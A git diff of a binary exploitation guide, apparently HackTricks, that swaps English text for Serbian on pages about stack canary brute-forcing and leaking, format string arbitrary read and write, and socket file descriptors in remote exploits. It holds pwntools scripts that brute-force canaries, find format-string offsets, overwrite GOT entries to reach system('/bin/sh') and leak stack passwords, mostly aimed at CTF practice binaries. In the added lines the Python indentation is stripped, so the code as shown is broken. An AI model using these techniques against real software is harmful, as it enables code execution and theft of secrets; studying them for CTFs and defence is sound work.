r.recvuntil("Username: ") - r.send(base + chr(guess)) +r.recvuntil("Username: ") +r.send(base + chr(guess)) - if "SOME OUTPUT" in r.clean(): - print "Guessed correct byte:", format(guess, '02x') - canary += chr(guess) - base += chr(guess) - guess = 0x0 - r.close() - break - else: - guess += 1 - r.close() +if "SOME OUTPUT" in r.clean(): +print "Guessed correct byte:", format(guess, '02x') +canary += chr(guess) +base += chr(guess) +guess = 0x0 +r.close() +break +else: +guess += 1 +r.close() - print "FOUND:\\x" + '\\x'.join("{:02x}".format(ord(c)) for c in canary) - return base +print "FOUND:\\x" + '\\x'.join("{:02x}".format(ord(c)) for c in canary) +return base canary_offset = 1176 base = "A" * canary_offset @@ -58,43 +57,41 @@ print("Brute-Forcing canary") base_canary = get_bf(base) #Get yunk data + canary CANARY = u64(base_can[len(base_canary)-8:]) #Get the canary ``` +### Primer 2 -### Example 2 - -This is implemented for 32 bits, but this could be easily changed to 64bits.\ -Also note that for this example the **program expected first a byte to indicate the size of the input** and the payload. - +Ovo je implementirano za 32 bita, ali se to može lako promeniti na 64 bita.\ +Takođe, imajte na umu da je za ovaj primer **program očekivao prvo bajt koji označava veličinu ulaza** i payload. ```python from pwn import * # Here is the function to brute force the canary def breakCanary(): - known_canary = b"" - test_canary = 0x0 - len_bytes_to_read = 0x21 +known_canary = b"" +test_canary = 0x0 +len_bytes_to_read = 0x21 - for j in range(0, 4): - # Iterate up to 0xff times to brute force all posible values for byte - for test_canary in range(0xff): - print(f"\rTrying canary: {known_canary} {test_canary.to_bytes(1, 'little')}", end="") +for j in range(0, 4): +# Iterate up to 0xff times to brute force all posible values for byte +for test_canary in range(0xff): +print(f"\rTrying canary: {known_canary} {test_canary.to_bytes(1, 'little')}", end="") - # Send the current input size - target.send(len_bytes_to_read.to_bytes(1, "little")) +# Send the current input size +target.send(len_bytes_to_read.to_bytes(1, "little")) - # Send this iterations canary - target.send(b"0"*0x20 + known_canary + test_canary.to_bytes(1, "little")) +# Send this iterations canary +target.send(b"0"*0x20 + known_canary + test_canary.to_bytes(1, "little")) - # Scan in the output, determine if we have a correct value - output = target.recvuntil(b"exit.") - if b"YUM" in output: - # If we have a correct value, record the canary value, reset the canary value, and move on - print(" - next byte is: " + hex(test_canary)) - known_canary = known_canary + test_canary.to_bytes(1, "little") - len_bytes_to_read += 1 - break +# Scan in the output, determine if we have a correct value +output = target.recvuntil(b"exit.") +if b"YUM" in output: +# If we have a correct value, record the canary value, reset the canary value, and move on +print(" - next byte is: " + hex(test_canary)) +known_canary = known_canary + test_canary.to_bytes(1, "little") +len_bytes_to_read += 1 +break - # Return the canary - return known_canary +# Return the canary +return known_canary # Start the target process target = process('./feedme') @@ -104,18 +101,17 @@ target = process('./feedme') canary = breakCanary() log.info(f"The canary is: {canary}") ``` - ## Threads -Threads of the same process will also **share the same canary token**, therefore it'll be possible to **brute-forc**e a canary if the binary spawns a new thread every time an attack happens. +Threadovi istog procesa će takođe **deliti isti canary token**, stoga će biti moguće **brute-forc**ati canary ako binarni program pokreće novu nit svaki put kada se dogodi napad. -Moreover, a buffer **overflow in a threaded function** protected with canary could be used to **modify the master canary stored in the TLS**. This is because, it might be possible to reach the memory position where the TLS is stored (and therefore, the canary) via a **bof in the stack** of a thread.\ -As a result, the mitigation is useless because the check is used with two canaries that are the same (although modified).\ -This attack is performed in the writeup: [http://7rocky.github.io/en/ctf/htb-challenges/pwn/robot-factory/#canaries-and-threads](http://7rocky.github.io/en/ctf/htb-challenges/pwn/robot-factory/#canaries-and-threads) +Štaviše, **buffer overflow u funkciji sa nitima** zaštićenoj canary-jem mogao bi se koristiti za **modifikaciju glavnog canary-ja koji se čuva u TLS-u**. To je zato što bi moglo biti moguće doći do memorijske pozicije gde se TLS čuva (i stoga, canary) putem **bof-a u steku** niti.\ +Kao rezultat, mitigacija je beskorisna jer se provera koristi sa dva canary-ja koja su ista (iako modifikovana).\ +Ovaj napad je izveden u izveštaju: [http://7rocky.github.io/en/ctf/htb-challenges/pwn/robot-factory/#canaries-and-threads](http://7rocky.github.io/en/ctf/htb-challenges/pwn/robot-factory/#canaries-and-threads) -Check also the presentation of [https://www.slideshare.net/codeblue_jp/master-canary-forging-by-yuki-koike-code-blue-2015](https://www.slideshare.net/codeblue_jp/master-canary-forging-by-yuki-koike-code-blue-2015) which mentions that usually the **TLS** is stored by **`mmap`** and when a **stack** of **thread** is created it's also generated by `mmap` according to this, which might allow the overflow as shown in the previous writeup. +Pogledajte takođe prezentaciju [https://www.slideshare.net/codeblue_jp/master-canary-forging-by-yuki-koike-code-blue-2015](https://www.slideshare.net/codeblue_jp/master-canary-forging-by-yuki-koike-code-blue-2015) koja pominje da se obično **TLS** čuva putem **`mmap`** i kada se kreira **stack** **niti** takođe se generiše putem `mmap`, što može omogućiti overflow kao što je prikazano u prethodnom izveštaju. ## Other examples & references - [https://guyinatuxedo.github.io/07-bof_static/dcquals16_feedme/index.html](https://guyinatuxedo.github.io/07-bof_static/dcquals16_feedme/index.html) - - 64 bits, no PIE, nx, BF canary, write in some memory a ROP to call `execve` and jump there. +- 64 bita, bez PIE, nx, BF canary, upisati u neku memoriju ROP za pozivanje `execve` i skočiti tamo. diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/print-stack-canary.md b/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/print-stack-canary.md index e4d3eed44..f279256d9 100644 --- a/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/print-stack-canary.md +++ b/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/print-stack-canary.md @@ -2,32 +2,32 @@ {{#include ../../../banners/hacktricks-training.md}} -## Enlarge printed stack +## Uvećaj štampanu stog -Imagine a situation where a **program vulnerable** to stack overflow can execute a **puts** function **pointing** to **part** of the **stack overflow**. The attacker knows that the **first byte of the canary is a null byte** (`\x00`) and the rest of the canary are **random** bytes. Then, the attacker may create an overflow that **overwrites the stack until just the first byte of the canary**. +Zamislite situaciju u kojoj **program ranjiv** na prelivanje stoga može izvršiti **puts** funkciju **koja pokazuje** na **deo** **prelivanja stoga**. Napadač zna da je **prvi bajt kanarija null bajt** (`\x00`) i da su ostali bajtovi kanarija **nasumični**. Tada, napadač može kreirati prelivanje koje **prepisuje stog sve do prvog bajta kanarija**. -Then, the attacker **calls the puts functionalit**y on the middle of the payload which will **print all the canary** (except from the first null byte). +Zatim, napadač **poziva puts funkcionalnost** na sredini payload-a koja će **odštampati ceo kanarij** (osim prvog null bajta). -With this info the attacker can **craft and send a new attack** knowing the canary (in the same program session). +Sa ovom informacijom, napadač može **izraditi i poslati novi napad** znajući kanarij (u istoj sesiji programa). -Obviously, this tactic is very **restricted** as the attacker needs to be able to **print** the **content** of his **payload** to **exfiltrate** the **canary** and then be able to create a new payload (in the **same program session**) and **send** the **real buffer overflow**. +Očigledno, ova taktika je veoma **ograničena** jer napadač mora biti u mogućnosti da **odštampa** **sadržaj** svog **payload-a** da bi **ekstrahovao** **kanarij** i zatim biti u mogućnosti da kreira novi payload (u **istoј sesiji programa**) i **pošalje** **pravi buffer overflow**. -**CTF examples:** +**CTF primeri:** - [**https://guyinatuxedo.github.io/08-bof_dynamic/csawquals17_svc/index.html**](https://guyinatuxedo.github.io/08-bof_dynamic/csawquals17_svc/index.html) - - 64 bit, ASLR enabled but no PIE, the first step is to fill an overflow until the byte 0x00 of the canary to then call puts and leak it. With the canary a ROP gadget is created to call puts to leak the address of puts from the GOT and the a ROP gadget to call `system('/bin/sh')` +- 64 bita, ASLR omogućeno, ali bez PIE, prvi korak je popuniti prelivanje do bajta 0x00 kanarija da bi se zatim pozvao puts i iscurio. Sa kanarijem se kreira ROP gadget za pozivanje puts da bi se iscurila adresa puts iz GOT-a i ROP gadget za pozivanje `system('/bin/sh')` - [**https://guyinatuxedo.github.io/14-ret_2_system/hxp18_poorCanary/index.html**](https://guyinatuxedo.github.io/14-ret_2_system/hxp18_poorCanary/index.html) - - 32 bit, ARM, no relro, canary, nx, no pie. Overflow with a call to puts on it to leak the canary + ret2lib calling `system` with a ROP chain to pop r0 (arg `/bin/sh`) and pc (address of system) +- 32 bita, ARM, bez relro, kanarij, nx, bez pie. Prelivanje sa pozivom na puts da bi se iscurio kanarij + ret2lib pozivajući `system` sa ROP lancem za pop r0 (arg `/bin/sh`) i pc (adresa sistema) -## Arbitrary Read +## Arbitrarni Čitanje -With an **arbitrary read** like the one provided by format **strings** it might be possible to leak the canary. Check this example: [**https://ir0nstone.gitbook.io/notes/types/stack/canaries**](https://ir0nstone.gitbook.io/notes/types/stack/canaries) and you can read about abusing format strings to read arbitrary memory addresses in: +Sa **arbitrarnim čitanjem** poput onog koji pružaju formatne **nizove** može biti moguće iscuriti kanarij. Pogledajte ovaj primer: [**https://ir0nstone.gitbook.io/notes/types/stack/canaries**](https://ir0nstone.gitbook.io/notes/types/stack/canaries) i možete pročitati o zloupotrebi formatnih nizova za čitanje arbitrarnim memorijskim adresama u: {{#ref}} ../../format-strings/ {{#endref}} - [https://guyinatuxedo.github.io/14-ret_2_system/asis17_marymorton/index.html](https://guyinatuxedo.github.io/14-ret_2_system/asis17_marymorton/index.html) - - This challenge abuses in a very simple way a format string to read the canary from the stack +- Ova izazov zloupotrebljava na veoma jednostavan način formatni niz za čitanje kanarija sa stoga {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/common-exploiting-problems.md b/src/binary-exploitation/common-exploiting-problems.md index 1aaf06372..10d45260b 100644 --- a/src/binary-exploitation/common-exploiting-problems.md +++ b/src/binary-exploitation/common-exploiting-problems.md @@ -1,15 +1,14 @@ -# Common Exploiting Problems +# Uobičajeni Problemi Eksploatacije {{#include ../banners/hacktricks-training.md}} -## FDs in Remote Exploitation +## FDs u Daljinskoj Eksploataciji -When sending an exploit to a remote server that calls **`system('/bin/sh')`** for example, this will be executed in the server process ofc, and `/bin/sh` will expect input from stdin (FD: `0`) and will print the output in stdout and stderr (FDs `1` and `2`). So the attacker won't be able to interact with the shell. +Kada se šalje eksploatacija na daljinski server koji poziva **`system('/bin/sh')`**, to će se izvršiti u procesu servera, i `/bin/sh` će očekivati ulaz sa stdin (FD: `0`) i će ispisivati izlaz na stdout i stderr (FD-ovi `1` i `2`). Tako da napadač neće moći da interaguje sa shell-om. -A way to fix this is to suppose that when the server started it created the **FD number `3`** (for listening) and that then, your connection is going to be in the **FD number `4`**. Therefore, it's possible to use the syscall **`dup2`** to duplicate the stdin (FD 0) and the stdout (FD 1) in the FD 4 (the one of the connection of the attacker) so it'll make feasible to contact the shell once it's executed. - -[**Exploit example from here**](https://ir0nstone.gitbook.io/notes/types/stack/exploiting-over-sockets/exploit): +Jedan način da se to reši je da se pretpostavi da kada je server pokrenut, stvorio je **FD broj `3`** (za slušanje) i da će vaša veza biti u **FD broju `4`**. Stoga, moguće je koristiti sistemski poziv **`dup2`** da se duplira stdin (FD 0) i stdout (FD 1) u FD 4 (onaj od veze napadača) kako bi se omogućila komunikacija sa shell-om kada se izvrši. +[**Primer eksploatacije odavde**](https://ir0nstone.gitbook.io/notes/types/stack/exploiting-over-sockets/exploit): ```python from pwn import * @@ -26,13 +25,12 @@ p.sendline(rop.chain()) p.recvuntil('Thanks!\x00') p.interactive() ``` - ## Socat & pty -Note that socat already transfers **`stdin`** and **`stdout`** to the socket. However, the `pty` mode **include DELETE characters**. So, if you send a `\x7f` ( `DELETE` -)it will **delete the previous character** of your exploit. +Napomena da socat već prenosi **`stdin`** i **`stdout`** na soket. Međutim, `pty` režim **uključuje DELETE karaktere**. Dakle, ako pošaljete `\x7f` ( `DELETE` -) to će **obrisati prethodni karakter** vašeg eksploita. -In order to bypass this the **escape character `\x16` must be prepended to any `\x7f` sent.** +Da biste to zaobišli, **karakter za bekstvo `\x16` mora biti prethodjen bilo kojem `\x7f` koji se šalje.** -**Here you can** [**find an example of this behaviour**](https://ir0nstone.gitbook.io/hackthebox/challenges/pwn/dream-diary-chapter-1/unlink-exploit)**.** +**Ovde možete** [**pronaći primer ovog ponašanja**](https://ir0nstone.gitbook.io/hackthebox/challenges/pwn/dream-diary-chapter-1/unlink-exploit)**.** {{#include ../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/format-strings/README.md b/src/binary-exploitation/format-strings/README.md index 3d7bfa018..8d318f222 100644 --- a/src/binary-exploitation/format-strings/README.md +++ b/src/binary-exploitation/format-strings/README.md @@ -2,22 +2,16 @@ {{#include ../../banners/hacktricks-training.md}} -
-If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). +## Osnovne Informacije -{% embed url="https://www.stmcyber.com/careers" %} +U C **`printf`** je funkcija koja se može koristiti za **štampanje** nekog stringa. **Prvi parametar** koji ova funkcija očekuje je **sirovi tekst sa formatima**. **Sledeći parametri** koji se očekuju su **vrednosti** za **zamenu** **formata** iz sirovog teksta. -## Basic Information +Druge ranjive funkcije su **`sprintf()`** i **`fprintf()`**. -In C **`printf`** is a function that can be used to **print** some string. The **first parameter** this function expects is the **raw text with the formatters**. The **following parameters** expected are the **values** to **substitute** the **formatters** from the raw text. - -Other vulnerable functions are **`sprintf()`** and **`fprintf()`**. - -The vulnerability appears when an **attacker text is used as the first argument** to this function. The attacker will be able to craft a **special input abusing** the **printf format** string capabilities to read and **write any data in any address (readable/writable)**. Being able this way to **execute arbitrary code**. - -#### Formatters: +Ranjivost se pojavljuje kada se **tekst napadača koristi kao prvi argument** ovoj funkciji. Napadač će moći da kreira **poseban unos koji zloupotrebljava** **printf format** string mogućnosti da čita i **piše bilo koje podatke na bilo kojoj adresi (čitljivo/pisivo)**. Na ovaj način će moći da **izvrši proizvoljan kod**. +#### Formati: ```bash %08x —> 8 hex bytes %d —> Entire @@ -28,72 +22,58 @@ The vulnerability appears when an **attacker text is used as the first argument* %hn —> Occupies 2 bytes instead of 4 $X —> Direct access, Example: ("%3$d", var1, var2, var3) —> Access to var3 ``` +**Primeri:** -**Examples:** - -- Vulnerable example: - +- Ranjivi primer: ```c char buffer[30]; gets(buffer); // Dangerous: takes user input without restrictions. printf(buffer); // If buffer contains "%x", it reads from the stack. ``` - -- Normal Use: - +- Normalna upotreba: ```c int value = 1205; printf("%x %x %x", value, value, value); // Outputs: 4b5 4b5 4b5 ``` - -- With Missing Arguments: - +- Sa nedostajućim argumentima: ```c printf("%x %x %x", value); // Unexpected output: reads random values from the stack. ``` - -- fprintf vulnerable: - +- fprintf ranjiv: ```c #include int main(int argc, char *argv[]) { - char *user_input; - user_input = argv[1]; - FILE *output_file = fopen("output.txt", "w"); - fprintf(output_file, user_input); // The user input can include formatters! - fclose(output_file); - return 0; +char *user_input; +user_input = argv[1]; +FILE *output_file = fopen("output.txt", "w"); +fprintf(output_file, user_input); // The user input can include formatters! +fclose(output_file); +return 0; } ``` +### **Pristupanje Pokazivačima** -### **Accessing Pointers** - -The format **`%$x`**, where `n` is a number, allows to indicate to printf to select the n parameter (from the stack). So if you want to read the 4th param from the stack using printf you could do: - +Format **`%$x`**, gde je `n` broj, omogućava da se printf-u naznači da izabere n-ti parametar (sa steka). Dakle, ako želite da pročitate 4. parametar sa steka koristeći printf, mogli biste to uraditi: ```c printf("%x %x %x %x") ``` +и могли бисте читати од првог до четвртог параметра. -and you would read from the first to the forth param. - -Or you could do: - +Или бисте могли да урадите: ```c printf("%4$x") ``` +i direktno pročitajte četvrti. -and read directly the forth. - -Notice that the attacker controls the `printf` **parameter, which basically means that** his input is going to be in the stack when `printf` is called, which means that he could write specific memory addresses in the stack. +Obratite pažnju da napadač kontroliše `printf` **parametar, što u suštini znači da** će njegov unos biti u steku kada se pozove `printf`, što znači da bi mogao da upiše specifične adrese u memoriji u stek. > [!CAUTION] -> An attacker controlling this input, will be able to **add arbitrary address in the stack and make `printf` access them**. In the next section it will be explained how to use this behaviour. +> Napadač koji kontroliše ovaj unos, moći će da **doda proizvoljnu adresu u stek i natera `printf` da im pristupi**. U sledećem odeljku biće objašnjeno kako koristiti ovo ponašanje. -## **Arbitrary Read** - -It's possible to use the formatter **`%n$s`** to make **`printf`** get the **address** situated in the **n position**, following it and **print it as if it was a string** (print until a 0x00 is found). So if the base address of the binary is **`0x8048000`**, and we know that the user input starts in the 4th position in the stack, it's possible to print the starting of the binary with: +## **Proizvoljno Čitanje** +Moguće je koristiti formatirator **`%n$s`** da natera **`printf`** da dobije **adresu** koja se nalazi na **n poziciji**, nakon nje i **odštampa je kao da je string** (štampanje dok se ne pronađe 0x00). Dakle, ako je osnovna adresa binarnog fajla **`0x8048000`**, i znamo da korisnički unos počinje na 4. poziciji u steku, moguće je odštampati početak binarnog fajla sa: ```python from pwn import * @@ -106,18 +86,16 @@ payload += p32(0x8048000) #6th param p.sendline(payload) log.info(p.clean()) # b'\x7fELF\x01\x01\x01||||' ``` - > [!CAUTION] -> Note that you cannot put the address 0x8048000 at the beginning of the input because the string will be cat in 0x00 at the end of that address. +> Imajte na umu da ne možete staviti adresu 0x8048000 na početak ulaza jer će string biti prekinut u 0x00 na kraju te adrese. -### Find offset +### Pronađi offset -To find the offset to your input you could send 4 or 8 bytes (`0x41414141`) followed by **`%1$x`** and **increase** the value till retrieve the `A's`. +Da biste pronašli offset za vaš ulaz, možete poslati 4 ili 8 bajtova (`0x41414141`) praćenih **`%1$x`** i **povećavati** vrednost dok ne dobijete `A's`.
Brute Force printf offset - ```python # Code from https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak @@ -125,88 +103,82 @@ from pwn import * # Iterate over a range of integers for i in range(10): - # Construct a payload that includes the current integer as offset - payload = f"AAAA%{i}$x".encode() +# Construct a payload that includes the current integer as offset +payload = f"AAAA%{i}$x".encode() - # Start a new process of the "chall" binary - p = process("./chall") +# Start a new process of the "chall" binary +p = process("./chall") - # Send the payload to the process - p.sendline(payload) +# Send the payload to the process +p.sendline(payload) - # Read and store the output of the process - output = p.clean() +# Read and store the output of the process +output = p.clean() - # Check if the string "41414141" (hexadecimal representation of "AAAA") is in the output - if b"41414141" in output: - # If the string is found, log the success message and break out of the loop - log.success(f"User input is at offset : {i}") - break +# Check if the string "41414141" (hexadecimal representation of "AAAA") is in the output +if b"41414141" in output: +# If the string is found, log the success message and break out of the loop +log.success(f"User input is at offset : {i}") +break - # Close the process - p.close() +# Close the process +p.close() ``` -
-### How useful +### Koliko je korisno -Arbitrary reads can be useful to: +Arbitrarna čitanja mogu biti korisna za: -- **Dump** the **binary** from memory -- **Access specific parts of memory where sensitive** **info** is stored (like canaries, encryption keys or custom passwords like in this [**CTF challenge**](https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak#read-arbitrary-value)) +- **Dump** **binarne** datoteke iz memorije +- **Pristup specifičnim delovima memorije gde je smeštena** **osetljiva** **informacija** (kao što su kanari, ključevi za enkripciju ili prilagođene lozinke kao u ovom [**CTF izazovu**](https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak#read-arbitrary-value)) -## **Arbitrary Write** +## **Arbitrarno Pisanje** -The formatter **`%$n`** **writes** the **number of written bytes** in the **indicated address** in the \ param in the stack. If an attacker can write as many char as he will with printf, he is going to be able to make **`%$n`** write an arbitrary number in an arbitrary address. - -Fortunately, to write the number 9999, it's not needed to add 9999 "A"s to the input, in order to so so it's possible to use the formatter **`%.%$n`** to write the number **``** in the **address pointed by the `num` position**. +Formatirnik **`%$n`** **piše** **broj napisanih bajtova** u **naznačenu adresu** u \ parametru na steku. Ako napadač može da piše onoliko karaktera koliko želi sa printf, moći će da natera **`%$n`** da upiše proizvoljan broj na proizvoljnu adresu. +Srećom, da bi se napisao broj 9999, nije potrebno dodavati 9999 "A" u ulaz, da bi se to postiglo moguće je koristiti formatirnik **`%.%$n`** da bi se napisao broj **``** u **adresu na koju ukazuje `num` pozicija**. ```bash AAAA%.6000d%4\$n —> Write 6004 in the address indicated by the 4º param AAAA.%500\$08x —> Param at offset 500 ``` +Međutim, imajte na umu da se obično za pisanje adrese kao što je `0x08049724` (što je OGROMAN broj za napisati odjednom), **koristi `$hn`** umesto `$n`. To omogućava da **napišete samo 2 bajta**. Stoga se ova operacija vrši dva puta, jednom za najviših 2B adrese i drugi put za najniže. -However, note that usually in order to write an address such as `0x08049724` (which is a HUGE number to write at once), **it's used `$hn`** instead of `$n`. This allows to **only write 2 Bytes**. Therefore this operation is done twice, one for the highest 2B of the address and another time for the lowest ones. +Zbog toga, ova ranjivost omogućava **pisanje bilo čega na bilo kojoj adresi (arbitrarno pisanje).** -Therefore, this vulnerability allows to **write anything in any address (arbitrary write).** - -In this example, the goal is going to be to **overwrite** the **address** of a **function** in the **GOT** table that is going to be called later. Although this could abuse other arbitrary write to exec techniques: +U ovom primeru, cilj će biti da se **prepiše** **adresa** **funkcije** u **GOT** tabeli koja će biti pozvana kasnije. Iako bi ovo moglo zloupotrebiti druge tehnike arbitrarno pisanje za izvršavanje: {{#ref}} ../arbitrary-write-2-exec/ {{#endref}} -We are going to **overwrite** a **function** that **receives** its **arguments** from the **user** and **point** it to the **`system`** **function**.\ -As mentioned, to write the address, usually 2 steps are needed: You **first writes 2Bytes** of the address and then the other 2. To do so **`$hn`** is used. +Prepisujemo **funkciju** koja **prima** svoje **argumente** od **korisnika** i **upućujemo** je na **`system`** **funkciju**.\ +Kao što je pomenuto, za pisanje adrese obično su potrebna 2 koraka: Prvo **napišete 2B** adrese, a zatim ostale 2. Da biste to uradili, koristi se **`$hn`**. -- **HOB** is called to the 2 higher bytes of the address -- **LOB** is called to the 2 lower bytes of the address +- **HOB** se poziva na 2 viša bajta adrese +- **LOB** se poziva na 2 niža bajta adrese -Then, because of how format string works you need to **write first the smallest** of \[HOB, LOB] and then the other one. +Zatim, zbog načina na koji funkcioniše format string, potrebno je **prvo napisati manji** od \[HOB, LOB] i zatim drugi. -If HOB < LOB\ +Ako je HOB < LOB\ `[address+2][address]%.[HOB-8]x%[offset]\$hn%.[LOB-HOB]x%[offset+1]` -If HOB > LOB\ +Ako je HOB > LOB\ `[address+2][address]%.[LOB-8]x%[offset+1]\$hn%.[HOB-LOB]x%[offset]` HOB LOB HOB_shellcode-8 NºParam_dir_HOB LOB_shell-HOB_shell NºParam_dir_LOB - ```bash python -c 'print "\x26\x97\x04\x08"+"\x24\x97\x04\x08"+ "%.49143x" + "%4$hn" + "%.15408x" + "%5$hn"' ``` - ### Pwntools Template -You can find a **template** to prepare a exploit for this kind of vulnerability in: +Možete pronaći **šablon** za pripremu eksploita za ovu vrstu ranjivosti u: {{#ref}} format-strings-template.md {{#endref}} -Or this basic example from [**here**](https://ir0nstone.gitbook.io/notes/types/stack/got-overwrite/exploiting-a-got-overwrite): - +Ili ovaj osnovni primer iz [**ovde**](https://ir0nstone.gitbook.io/notes/types/stack/got-overwrite/exploiting-a-got-overwrite): ```python from pwn import * @@ -225,27 +197,20 @@ p.sendline('/bin/sh') p.interactive() ``` +## Format Strings do BOF -## Format Strings to BOF +Moguće je zloupotrebiti akcije pisanja u ranjivosti format stringa da se **piše u adrese steka** i iskoristi ranjivost tipa **buffer overflow**. -It's possible to abuse the write actions of a format string vulnerability to **write in addresses of the stack** and exploit a **buffer overflow** type of vulnerability. - -## Other Examples & References +## Ostali Primeri i Reference - [https://ir0nstone.gitbook.io/notes/types/stack/format-string](https://ir0nstone.gitbook.io/notes/types/stack/format-string) - [https://www.youtube.com/watch?v=t1LH9D5cuK4](https://www.youtube.com/watch?v=t1LH9D5cuK4) - [https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak](https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak) - [https://guyinatuxedo.github.io/10-fmt_strings/pico18_echo/index.html](https://guyinatuxedo.github.io/10-fmt_strings/pico18_echo/index.html) - - 32 bit, no relro, no canary, nx, no pie, basic use of format strings to leak the flag from the stack (no need to alter the execution flow) +- 32 bita, bez relro, bez kanarija, nx, bez pie, osnovna upotreba format stringova za curenje zastavice iz steka (nije potrebno menjati tok izvršenja) - [https://guyinatuxedo.github.io/10-fmt_strings/backdoor17_bbpwn/index.html](https://guyinatuxedo.github.io/10-fmt_strings/backdoor17_bbpwn/index.html) - - 32 bit, relro, no canary, nx, no pie, format string to overwrite the address `fflush` with the win function (ret2win) +- 32 bita, relro, bez kanarija, nx, bez pie, format string za prepisivanje adrese `fflush` sa funkcijom win (ret2win) - [https://guyinatuxedo.github.io/10-fmt_strings/tw16_greeting/index.html](https://guyinatuxedo.github.io/10-fmt_strings/tw16_greeting/index.html) - - 32 bit, relro, no canary, nx, no pie, format string to write an address inside main in `.fini_array` (so the flow loops back 1 more time) and write the address to `system` in the GOT table pointing to `strlen`. When the flow goes back to main, `strlen` is executed with user input and pointing to `system`, it will execute the passed commands. - -
- -If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). - -{% embed url="https://www.stmcyber.com/careers" %} +- 32 bita, relro, bez kanarija, nx, bez pie, format string za pisanje adrese unutar main u `.fini_array` (tako da se tok vraća još jednom) i pisanje adrese u `system` u GOT tabeli koja pokazuje na `strlen`. Kada se tok vrati u main, `strlen` se izvršava sa korisničkim unosom i pokazuje na `system`, izvršiće prosleđene komande. {{#include ../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/format-strings/format-strings-arbitrary-read-example.md b/src/binary-exploitation/format-strings/format-strings-arbitrary-read-example.md index 0665b14a1..cf0c1fda6 100644 --- a/src/binary-exploitation/format-strings/format-strings-arbitrary-read-example.md +++ b/src/binary-exploitation/format-strings/format-strings-arbitrary-read-example.md @@ -2,31 +2,26 @@ {{#include ../../banners/hacktricks-training.md}} -## Read Binary Start - -### Code +## Čitanje binarnih podataka - Početak +### Kod ```c #include int main(void) { - char buffer[30]; +char buffer[30]; - fgets(buffer, sizeof(buffer), stdin); +fgets(buffer, sizeof(buffer), stdin); - printf(buffer); - return 0; +printf(buffer); +return 0; } ``` - -Compile it with: - +Kompajlirati sa: ```python clang -o fs-read fs-read.c -Wno-format-security -no-pie ``` - -### Exploit - +### Eksploatacija ```python from pwn import * @@ -38,16 +33,14 @@ payload += p64(0x00400000) p.sendline(payload) log.info(p.clean()) ``` - -- The **offset is 11** because setting several As and **brute-forcing** with a loop offsets from 0 to 50 found that at offset 11 and with 5 extra chars (pipes `|` in our case), it's possible to control a full address. - - I used **`%11$p`** with padding until I so that the address was all 0x4141414141414141 -- The **format string payload is BEFORE the address** because the **printf stops reading at a null byte**, so if we send the address and then the format string, the printf will never reach the format string as a null byte will be found before -- The address selected is 0x00400000 because it's where the binary starts (no PIE) +- **Offset je 11** jer je postavljanje nekoliko A i **brute-forcing** sa petljom offseta od 0 do 50 pokazalo da je na offsetu 11 i sa 5 dodatnih karaktera (cijevi `|` u našem slučaju) moguće kontrolisati punu adresu. +- Koristio sam **`%11$p`** sa paddingom dok nisam dobio da je adresa sve 0x4141414141414141 +- **Format string payload je PRE adrese** jer **printf prestaje da čita na null bajtu**, tako da ako pošaljemo adresu, a zatim format string, printf nikada neće doći do format stringa jer će null bajt biti pronađen pre +- Odabrana adresa je 0x00400000 jer je to mesto gde binarni fajl počinje (bez PIE)
-## Read passwords - +## Pročitaj lozinke ```c #include #include @@ -55,111 +48,103 @@ log.info(p.clean()) char bss_password[20] = "hardcodedPassBSS"; // Password in BSS int main() { - char stack_password[20] = "secretStackPass"; // Password in stack - char input1[20], input2[20]; +char stack_password[20] = "secretStackPass"; // Password in stack +char input1[20], input2[20]; - printf("Enter first password: "); - scanf("%19s", input1); +printf("Enter first password: "); +scanf("%19s", input1); - printf("Enter second password: "); - scanf("%19s", input2); +printf("Enter second password: "); +scanf("%19s", input2); - // Vulnerable printf - printf(input1); - printf("\n"); +// Vulnerable printf +printf(input1); +printf("\n"); - // Check both passwords - if (strcmp(input1, stack_password) == 0 && strcmp(input2, bss_password) == 0) { - printf("Access Granted.\n"); - } else { - printf("Access Denied.\n"); - } +// Check both passwords +if (strcmp(input1, stack_password) == 0 && strcmp(input2, bss_password) == 0) { +printf("Access Granted.\n"); +} else { +printf("Access Denied.\n"); +} - return 0; +return 0; } ``` - -Compile it with: - +Kompajlirati sa: ```bash clang -o fs-read fs-read.c -Wno-format-security ``` +### Čitanje sa steka -### Read from stack - -The **`stack_password`** will be stored in the stack because it's a local variable, so just abusing printf to show the content of the stack is enough. This is an exploit to BF the first 100 positions to leak the passwords form the stack: - +**`stack_password`** će biti smešten u stek jer je to lokalna promenljiva, tako da je dovoljno samo zloupotrebiti printf da prikaže sadržaj steka. Ovo je eksploatacija za BF prvih 100 pozicija da se otkriju lozinke iz steka: ```python from pwn import * for i in range(100): - print(f"Try: {i}") - payload = f"%{i}$s\na".encode() - p = process("./fs-read") - p.sendline(payload) - output = p.clean() - print(output) - p.close() +print(f"Try: {i}") +payload = f"%{i}$s\na".encode() +p = process("./fs-read") +p.sendline(payload) +output = p.clean() +print(output) +p.close() ``` - -In the image it's possible to see that we can leak the password from the stack in the `10th` position: +Na slici je moguće videti da možemo da iscurimo lozinku iz steka na `10.` poziciji:
-### Read data +### Čitanje podataka -Running the same exploit but with `%p` instead of `%s` it's possible to leak a heap address from the stack at `%25$p`. Moreover, comparing the leaked address (`0xaaaab7030894`) with the position of the password in memory in that process we can obtain the addresses difference: +Pokretanjem istog eksploita, ali sa `%p` umesto `%s`, moguće je iscuriti adresu iz heap-a iz steka na `%25$p`. Pored toga, upoređujući iscurenu adresu (`0xaaaab7030894`) sa pozicijom lozinke u memoriji u tom procesu, možemo dobiti razliku adresa:
